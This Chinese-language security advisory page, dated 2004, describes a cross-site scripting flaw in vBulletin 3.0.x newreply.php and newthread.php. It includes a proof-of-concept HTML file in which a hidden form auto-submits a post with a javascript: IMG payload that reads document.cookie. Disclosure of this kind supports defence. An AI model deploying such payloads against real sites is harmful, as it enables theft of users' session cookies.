首页 -> 安全研究

安全研究

安全漏洞
vBulletin newreply.php跨站脚本漏洞

发布日期:2004-06-25
更新日期:2004-06-30

受影响系统:
VBulletin VBulletin 3.0.1
VBulletin VBulletin 3.0 Gamma
VBulletin VBulletin 3.0 beta 7
VBulletin VBulletin 3.0 beta 6
VBulletin VBulletin 3.0 beta 5
VBulletin VBulletin 3.0 beta 4
VBulletin VBulletin 3.0 beta 3
VBulletin VBulletin 3.0 beta 2
描述:
BUGTRAQ  ID: 10612

vBulletin是一款基于WEB的论坛程序。

vBulletin包含的newreply.php没有正确过滤用户提交的URI输入,远程攻击者可以利用这个漏洞获得目标用户敏感信息如COOKIE验证信息。

当用户预览帖子时,newreply.php和newthread.php都对Preview中的输入缺少过滤,攻击者可以注入恶意脚本代码,当其他用户查看此链接时,可导致恶意代码在用户浏览器上执行,可获得基于验证的COOKIE信息。

<*来源:Cheng Peng Su (apple_soup@msn.com
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=108809720026642&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

-------------------------Remote.html-------------------------
   <form action="http://host/newreply.php" name="vbform"
   method="post" style='visibility:hidden'>
   <input name="WYSIWYG_HTML"
   value="&lt;IMG src=&quot;javascript:alert(document.cookie)&quot;&gt;"/>
        <input name="do" value="postreply"/>
        <input name="t" value="123456" />
        <input name="p" value="123456" />
        <input type="submit" class="button" name="preview"/>
   </form>
   &lt;script&gt;
     document.all.preview.click();
   &lt;/script&gt;
   -----------------------------End-----------------------------

建议:
厂商补丁:

VBulletin
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.vbulletin.com/

浏览次数:4996
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障